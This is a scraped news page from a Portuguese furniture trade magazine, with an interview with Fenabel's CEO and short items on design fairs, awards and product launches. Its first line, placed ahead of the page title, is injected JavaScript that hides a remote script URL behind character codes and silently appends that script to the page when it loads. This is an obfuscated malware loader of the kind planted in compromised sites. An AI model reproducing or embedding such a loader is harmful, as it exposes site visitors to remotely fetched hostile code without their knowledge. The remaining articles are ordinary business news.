var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 97, 97, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Notícias - Revista Mobiliário em Notícia

A MN esteve à conversa com o CEO da Fenabel

Por

 

Líder no mercado de fabrico de cadeiras, a Fenabel distingue-se pelo serviço e produtos únicos que disponibilizam aos seus clientes. A MN esteve à conversa com Mário Leite, CEO da empresa, para saber mais sobre a história e o que faz da marca um grande sucesso.

 

Como e quando surgiu a Fenabel?

Mário Leite: A Fenabel é uma empresa de cariz familiar, que começou em 1992 com os quatro irmãos e com da junção de Fernando e Abel formou-se a nomenclatura da empresa. Começou desde cedo pela dedicação a cadeiras e conseguiu crescer até 1999. Depois houve uma transformação na sociedade com a saída dos meus irmãos e entrou uma nova sócia. A empresa teve sempre como foco a exportação e esse objetivo tem sido uma aposta crescente. Sempre olhamos para a exportação como o futuro. Em 2002 voltamos a crescer nesse sentido, até à participação em feiras, das quais se destaca a Isaloni, onde fizemos 12 anos de participação nesta edição.

Considera que o momento em que foi para as feiras foi crucial?

ML: Não considero crucial. Os nossos clientes muito exigentes ajudaram-nos a melhorar todos os dias. Já as feiras Internacionais deram-nos outra visão do mercado. O sucesso da Fenabel é uma soma de fatores. A empresa tem crescido igualmente com aposta no design de produto, aumento do dep. de qualidade, com aposta no dep. de marketing entre outros.

Como vê a reputação de serem considerados como alfaiates das cadeiras?

ML: Sempre fomos muito versáteis. Estivemos ligados a escolas de design e a projetos de diferentes que ajudaram a consolidar o nome que temos hoje, e essa mesma reputação. A possibilidade de darmos oportunidade ao cliente de criar peças únicas ajudou também nesse sentido porque o cliente tem o sonho e nós o tornamos realidade. Além do nosso produto muito próprio, facilmente identificável no mercado como algo Fenabel, também é importante ter o serviço ao cliente, para o mesmo saber que tem um parceiro que torna realidade o que quer.

É, por isso, um serviço personalizado?

ML: Sim. Muito ligado à empresa, às emoções e à vivência com o cliente e com os fornecedores, que também são muito importantes para nós.

Que novidades vão apresentar a curto prazo? 

ML: Entramos agora numa nova fase, decidida este ano, com uma unidade de 6000m2 que começou a ser construída no início deste ano, à entrada de Rebordosa. Numa primeira fase, visa dar melhores condições de trabalho aos cerca de 100 colaboradores, pelo maior espaço disponível, e numa segunda fase potenciar o crescimento geral da empresa. 

Onde se encontra o mercado da Fenabel?

ML: Essencialmente é dentro da Europa, como Espanha, França, Alemanha, Reino Unido e Holanda. Temos também vindo a apostar nos últimos anos no mercado dos Estados Unidos da América e Canadá, que achámos muito interessantes. Se as taxas cambiais não se alterarem muito, tornar-se-á uma aposta maior principalmente tendo em conta esta cultura geral mundial de largar a China em termos de produção.

A exportação significa quanto para a empresa?

ML: Cerca de 80 por cento de faturação.

E em Portugal, como está a Fenabel?

ML: A marca está bem-conceituada no nosso país. Portugal está na moda e já é reconhecido internacionalmente, como por exemplo no mercado norte-americano, como um país de mobiliário de qualidade. Mas não só, tem ainda popularidade no calçado e no turismo. Fala-se muito do Porto e Lisboa. Era também preciso que outras zonas começassem a aproveitar esta reputação. Temos marcas excelentes, com reconhecimento mundial. Há muitas empresas como a Fenabel em Portugal, felizmente, que dão orgulho ao nosso país. 

Quais são os vossos parceiros nacionais? 

ML: Trabalhámos muito com fábricas de mobiliário. Vendemos cá, mas são clientes que depois exportam. Por isso exportamos na realidade cerca de 90 por cento. Também trabalhamos o segmento Contract, que por sua vez vende produção para hotéis e restaurantes.

Relativamente aos últimos 25 anos, e à aposta da inovação para o futuro, o que distingue a Fenabel no mercado?

ML: O espírito Fenabel. Temos de manter a equipa motivada todos os dias e vender não pelo preço, mas pela proximidade ao cliente, pelo serviço, por ter bons “players” a jusante e a montante. Esta ligação é algo que nunca abandonaremos.

Pretende posteriormente alargar o mercado para outros locais?

ML: Vendemos para cerca de 35 países, um pouco por todo o mundo. Vendemos para Angola, Tunísia, Japão, Coreia, Rússia, Israel, Chipre, Nova Zelândia, Austrália. Mas pretendemos sobretudo cimentar os nossos mercados, antes de arriscar. 

Que conselho daria aos empreendedores portugueses que estão a pensar entrar neste mercado?

ML: Ninguém consegue singrar sem ter sacrifícios e riscos. É preciso dedicação à causa e muito apoio. Aproveitar as relações humanas é também uma vantagem, algo potenciado pela internet. A “receita” Fenabel tem resultado, como ter bons parceiros, boas relações humanas e muito trabalho.

Nunca pensou em diversificar o negócio, para além das cadeiras?

ML: Tudo o que for para sentar é negócio Fenabel. Se a empresa trabalhar bem o sentar, tem muito que trabalhar.

Que mensagem gostaria de deixar?

ML: Obrigado pelo apoio à Fenabel, por tudo o que fazem diariamente à empresa. O que somos hoje é o que seremos no futuro. O nosso sucesso é o resultado do sucesso de todos que trabalham connosco.

Volume de negócios…

ML: O ano passado faturamos à volta de oito milhões de euros. A Fenabel teve dois anos seguidos em que cresceu na ordem dos 12, 13 por cento. Este ano é mais uma vez de cimentação e crescimento, em que os indicadores apontam novamente para 12 por cento de aumento de volume de negócios.

O mercado apresenta dificuldade em recrutar colaboradores como por exemplo estofadores? 

ML: Já começa a haver esse problema e irá existir mais expressivamente no futuro. Por isso temos apostado na formação interna, com pessoas novas.

 

 

Ler mais

OIA PARTICIPA EM FESTIVAL DINAMARQUÊS

Por



A OIA — Furniture & Objects está presente no certame 3daysofdesign a decorrer de 24 a 26 de maio em Copenhaga, Dinamarca, a convite da AICEP — Portugal Global e da Embaixada de Portugal.

A marca portuguesa está representada na exposição "Changing matters", que tem como objetivo comunicar o potencial dos materiais portugueses e a excelência do design nacional no mercado da Dinamarca, com uma das mesas de apoio em marmore Eramosa da série COSMOS, a qual foi, juntamente com outras 14 marcas, selecionada pelo curador do evento Niels Stroyer Christophersen, fundador da marca dinamarquesa de design de interiores Frama CPH.

O evento 3daysofdesign é o principal festival de design dinamarquês, que decorre anualmente em Copenhaga e é centrado em novos conceitos relacionados com lifestyle, iluminação e design de interiores. 0 evento realiza-se em mais de 60 showrooms, instituições e espacos públicos, localizados no centro de Copenhaga. 

Ler mais

Ferreira de Sá premiada com o Best Décor 2018

Por

 

A Tapeçaria Ferreira de Sá foi lançada na Feira Internacional de Mobiliário em Singapura, que teve lugar de 8 a 11 de março.

A empresa, apresentada apenas este ano no mercado asiático, foi galardoada na categoria de decoração de interiores com o prémio Best Décor 2018. Este prémio advém da inovação e dos produtos exclusivos que a empresa exibiu na feira e o impacto extremamente positivo que conseguiu alcançar.

Para mais informações consulte: www.ferreiradesa.pt

Ler mais

Portugal ganha dois Prémios na Casa Decor 2018

Por

Portugal arrecadou dois Prémios na edição 2018 da Casa Decor, em Madrid, durante a Gala dos VI Premios a la Decoración y el Interiorismo Casa Decor 2018: o Prémio de Espaço mais votado pelo Público e a Menção Honrosa de Melhor Desenho Original, atribuído à “Ilha da Cozinha”. 

“Arte e Design fundem-se num espaço de corte clássico, destacando-se uma grande ilha central de mármore rosa português, na zona da cozinha, que entusiasmou a grande maioria dos visitantes”, pode ler-se no site da Casa Decor, sobre os Prémios. (Aqui: https://casadecor.es/la-casa-marcha/edicion-madrid-2018/entrega-de-los-vi-premios-a-la-decoracion/)

Pelo terceiro ano consecutivo, a AICEP organizou a participação de Portugal na Casa Decor, que arrancou a 15 de fevereiro e termina a 25 de março de 2018. Sob o lema Portugal es tu casa, o espaço de Portugal, com 60 metros quadrados, tem em exposição produtos de cerca de três dezenas de empresas portuguesas da Fileira Casa, dos setores do mobiliário, utilidades domésticas, iluminação, têxtil-lar e também alguns materiais de construção.

Este ano a decoração do espaço de Portugal ficou a cargo de Beatriz Silveira (www.beatrizsilveira.com), designer espanhola de interiores, que, desde que abriu o seu estúdio em 2005, tem apostado no desenvolvimento de projetos residenciais privados e espaços profissionais.

Ler mais

Grupo Biesse vence The Digital Technology Award

Por

O Grupo Biesse está entre os onze vencedores nacionais da Itália no European Business Awards, a maior competição corporativa patrocinada pela RSM.

As empresas, selecionadas como as melhores nas 11 categorias de prémio, por um grupo de juízes independentes, composto por líderes empresariais, políticos e académicos, representarão o seu país na fase final da competição. Isto é, o prémio faz parte de uma fase inicial da competição que continuará competindo com os concorrentes europeus na Polónia (de 22 a 23 de maio).

A Biesse acredita fortemente no potencial da Indústria 4.0 e há mais de um ano que se encontra a realizar, com investimentos consideráveis em pesquisa e desenvolvimento, um projeto que revolucionará o mercado de máquinas de processamento: uma plataforma de serviços avançados e produtivos que permite aos clientes uma alta gama de serviços para simplificar e agilizar o gerenciamento do trabalho. Aliás, na fábrica digital do futuro, através do monitoramento contínuo de dados, será possível observar a transição da produção em massa para a customização em massa.

Desde 2007, o European Business Awards tem vindo a lançar luz sobre as empresas mais inovadoras do continente, promovendo o sucesso, a inovação e a ética na comunidade empresarial europeia. Nos Prémios 2016/17, as EBAs envolveram mais de 33.000 organizações em 34 países.

Ler mais

Light+Building 2018

Por
Messe Frankfurt Exhibition GmbH / Pietro Sutera
Messe Frankfurt Exhibition GmbH / Pietro Sutera
Arrancou ontem em Frankfurt a Light+Building, a maior feira internacional de iluminação, arquitetura e tecnologia.
Até ao dia 23 de março, serão apresentadas soluções inteligentes, tecnologia orientada para o futuro e tendências na área do design, que tornam os edifícios mais eficientes e aumentam os padrões de conforto e de segurança.
Durante os seis dias de feira, cerca de 2.500 expositores exibem os mais recentes produtos nos setores de iluminação, engenharia elétrica e gestão inteligente de casas e edifícios.
A tecnologia LED e OLED, os painéis fotovoltaicos, a mobilidade elétrica e a gestão inteligente de consumo de eletricidade são alguns dos temas em destaque.
A Light+Building distingue-se pelo seu extenso programa de eventos, que em 2018 estão estruturados e subdivididos em quatro categorias – Emoção, Seleção, Capacidades e Carreiras, tornando-se assim mais fácil selecionar as áreas de interesse pretendidas e atingir os objetivos individuais na Feira.
Mais informações:
https://light-building.messefrankfurt.com/frankfurt/en.html
Ler mais

Inovação aliada ao Design e Segurança

Por

CREA7IONEVOPlus

A GlammFire apostou numa atualização da gama Crea7ionEvo que agora é Plus. Adicionou inovação à tecnologia, com várias vantagens, como conexão à automação residencial e otimização do consumo.

A Crea7ionEVOPlus está disponível através de um queimador em linha ou um queimador redondo, ambos com modo de ignição através de um controle remoto, que permite que arquitetos e designers de interiores criem novas formas de combinar fogo com decoração.

Ler mais

Biesse apresentou a sua nova filial em Portugal

Por

 

O Grupo Biesse, fabricante multinacional líder em tecnologia de mecanização de madeira, vidro, pedra, plástico e metal, apresentou no passado dia 1 de março a sua filial número 38, Biesse Portugal, com os escritórios centrais no Porto.
O lançamento foi realizado com um cocktail que contou com a presença de diversos clientes, onde João Couto, diretor comercial da Biesse Portugal, apresentou o plano de negócios e a planificação para os próximos anos.

"Biesse Portugal serve, em 1º lugar, para uma aproximação da casa mãe a todos mercados, com a finalidade de melhorar o apoio aos clientes que já possuem os nossos equipamentos, poder conhecer melhor as necessidades e problemas que os mesmos têm e procurar fazer parte ativa da solução", explicou João Couto. "Outra razão, e muito importante também, será sempre a de aumentar a sua penetração e quota de mercado. A Biesse, sendo empresa líder a nível mundial no nosso setor, procura em todos os mais importantes mercados, ter essa mesma possibilidade e ao mesmo tempo, responder a todos os clientes locais, de uma maneira global com uma linguagem local, que serve para ser entendida facilmente pelos seus clientes e parceiros bem como poder prestar melhores serviços e a preços mais acessíveis".

A nova sede da Biesse permitirá que a marca amplie a sua cobertura comercial no país, fortaleça o seu serviço técnico e ofereça uma atenção mais direta ao mercado português para ajudar os profissionais a alcançar uma maior rentabilidade.

Após o desempenho bem sucedido do Grupo Biesse em todo o mundo, que alcançou um crescimento de resultados de 61% nos últimos quatro anos, as expectativas para o mercado português são altas.

 

Ler mais

Axor apresenta a tecnologia PowderRain na CASA DECOR 2018

Por

Até ao próximo dia 25 de Março, a Axor, marca de luxo de torneiras e soluções para casa de banho e cozinha, leva até à Casa Decor 2018 a sua mais recente tecnologia PowderRain, uma inovação que permite ao utilizador sentir um jato chuva sedosa na pele e obter hidratação como nunca.
Para a ocasião e em colaboração com o estúdio de decoração Ele Room 62, a AXOR projetou o Luí. Lei, uma casa de banho única na qual ele e ela encontram o seu próprio espaço. Um equilíbrio entre as necessidades das mulheres e dos homens, respeitando o caráter de ambos.

Luí. Lei.

A zona das águas é a protagonista da casa de banho, estando envolvida num grande cubo de mármore que preside e distribui o espaço à sua volta. É concebida para se desfrutar de uma experiência única de duche em casal e que mima em todos os sentidos.
O novo chuveiro AXOR 350 envolve o nosso corpo num manto de água protetor e quente, graças à tecnologia PowderRain. Dezenas de gotículas minúsculas cobrem cada parte do corpo com mais intensidade do que os chuveiros convencionais. "O segredo do PowderRain reside no trabalho minucioso que permitiu investigar meticulosamente cada milímetro de bocal, disco a jato e chuveiro fixo para criar esta tecnologia inovadora. O resultado vê-se mas, acima de tudo, sente-se ", específica o Diretor de Marketing da Hansgrohe Espanha, Luis Montes de Oca.
A experiência nesta zona de águas é completada com uma grande banheira independente rodeada de vegetação e protegida por uma estrutura que promove a sofisticação e intimidade ao espaço.
Em ambos os lados deste grande cubo central, ele e ela encontram o seu próprio espaço. 

 

 

 

Ler mais
×

Log in

×

Inscreva-se para se manter em contato!

Seja o primeiro a conhecer ofertas especiais e acordos exclusivos da Mobiliário em Notícia e dos nossos parceiros.

Check out our Política de Privacidade & Termos de Utilização
Você pode cancelar a assinatura da lista de e-mail a qualquer momento